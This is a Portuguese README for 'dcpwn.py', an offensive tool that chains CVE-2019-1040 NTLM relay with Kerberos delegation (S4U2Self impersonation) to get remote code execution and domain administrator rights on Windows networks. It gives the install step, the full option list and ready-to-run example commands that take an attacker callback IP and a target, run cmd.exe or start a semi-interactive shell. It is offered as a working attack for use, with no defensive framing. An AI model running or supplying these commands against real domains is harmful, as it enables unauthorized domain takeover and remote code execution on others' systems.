
CVE-2019-1040 com delegação Kerberos
Ótimo artigo! Explorando CVE-2019-1040 - Combinando vulnerabilidades de relay para RCE e Administrador de Domínio .
Então, escrevi dcpwn.py para facilitar o uso.
Estas ferramentas requerem impacket. Você pode instalá-lo via pip
pip install impacket
usage: dcpwn.py [-h] [-u USERNAME] [-p PASSWORD] [--hashes HASHES] -d DOMAIN
[--smb-port [destination port]] --callback-ip CALLBACK_IP
--ldaps LDAPS --dc-ip DC_IP [--timeout TIMEOUT]
[--impersonate IMPERSONATE] -t Target [-share SHARE]
[--command [COMMAND [COMMAND ...]]] [--debug]
CVE-2019-1040 com delegação Kerberos
optional arguments:
-h, --help show this help message and exit
-u USERNAME, --user USERNAME
nome de usuário para autenticação
-p PASSWORD, --password PASSWORD
Senha para autenticação, será solicitada se não for
especificada e nenhum hash NT:NTLM for fornecido
--hashes HASHES Hashes LM:NLTM
-d DOMAIN, --domain DOMAIN
domínio do usuário (FQDN ou nome de domínio NETBIOS)
--smb-port [destination port]
Porta de destino para conectar ao servidor SMB
--callback-ip CALLBACK_IP
Hostname ou IP do atacante
--ldaps LDAPS Hostname ou servidor ldaps
--dc-ip DC_IP Endereço IP do controlador de domínio
--timeout TIMEOUT tempo limite em segundos
--impersonate IMPERSONATE
nome de usuário alvo que será impersonado (através de
S4U2Self) para consultar o ST. Tenha em mente que isso
só funcionará se a identidade fornecida neste script
for permitida para delegação ao SPN especificado
-t Target, --target Target
Hostname/IP do servidor alvo
-share SHARE compartilhamento de onde a saída será obtida (padrão
ADMIN$)
--command [COMMAND [COMMAND ...]]
comando a executar no alvo. Se vazio, iniciará um
shell semi-interativo
--debug Habilitar saída de depuração
exemplo:
sudo python dcpwn.py -u user -p pass -d domain.com --callback-ip attackterip --ldaps ldapsip --dc-ip DCip -t target

Se você quiser executar algum comando como cmd.exe, use --command
exemplo:
sudo python dcpwn.py -u user -p pass -d domain.com --callback-ip attackterip --ldaps ldapsip --dc-ip DCip -t target --command 'cmd.exe'
Se você quiser impersonar um usuário específico, use --impersonate
sudo python dcpwn.py -u user -p pass -d domain.com --callback-ip attackterip --ldaps ldapsip --dc-ip DCip -t target --impersonate someone